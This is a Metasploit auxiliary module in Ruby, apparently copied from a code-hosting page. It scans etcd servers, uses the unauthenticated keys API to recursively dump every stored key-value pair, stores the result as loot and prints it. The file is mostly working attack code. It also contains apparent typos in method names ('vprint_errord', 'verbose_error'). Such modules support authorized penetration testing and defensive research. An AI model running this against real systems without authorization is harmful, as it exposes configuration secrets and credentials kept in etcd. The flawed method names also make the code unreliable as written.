60 lines
1.8 KiB
Ruby
60 lines
1.8 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Auxiliary::Report
|
|
include Msf::Auxiliary::Etcd
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Etcd Keys API Information Gathering',
|
|
'Description' => %q(
|
|
This module queries the etcd API to recursively retrieve all of the stored
|
|
key value pairs. Etcd by default does not utilize authentication.
|
|
),
|
|
'References' => [
|
|
['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']
|
|
],
|
|
'Author' => [
|
|
'Giovanni Collazo <hello@gcollazo.com>', # discovery
|
|
'h00die' # msf module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'DisclosureDate' => "Mar 16 2018"
|
|
)
|
|
end
|
|
|
|
def run_host(_target_host)
|
|
path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')
|
|
|
|
banner = fingerprint_service(target_uri.to_s)
|
|
vprint_status("#{peer} - Collecting data through #{path}...")
|
|
res = send_request_raw(
|
|
'uri' => path,
|
|
'method' => 'GET'
|
|
)
|
|
|
|
# parse the json if we got a good request back
|
|
if res && res.code == 200
|
|
begin
|
|
response = res.get_json_document
|
|
store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')
|
|
rescue JSON::ParserError => e
|
|
print_error("Failed to read JSON: #{e.class} - #{e.message}}")
|
|
return
|
|
end
|
|
print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")
|
|
elsif res
|
|
vprint_errord("Invalid response #{res.code} for etcd open keys response")
|
|
return
|
|
else
|
|
verbose_error("No response for etcd open keys probe")
|
|
return
|
|
end
|
|
end
|
|
end
|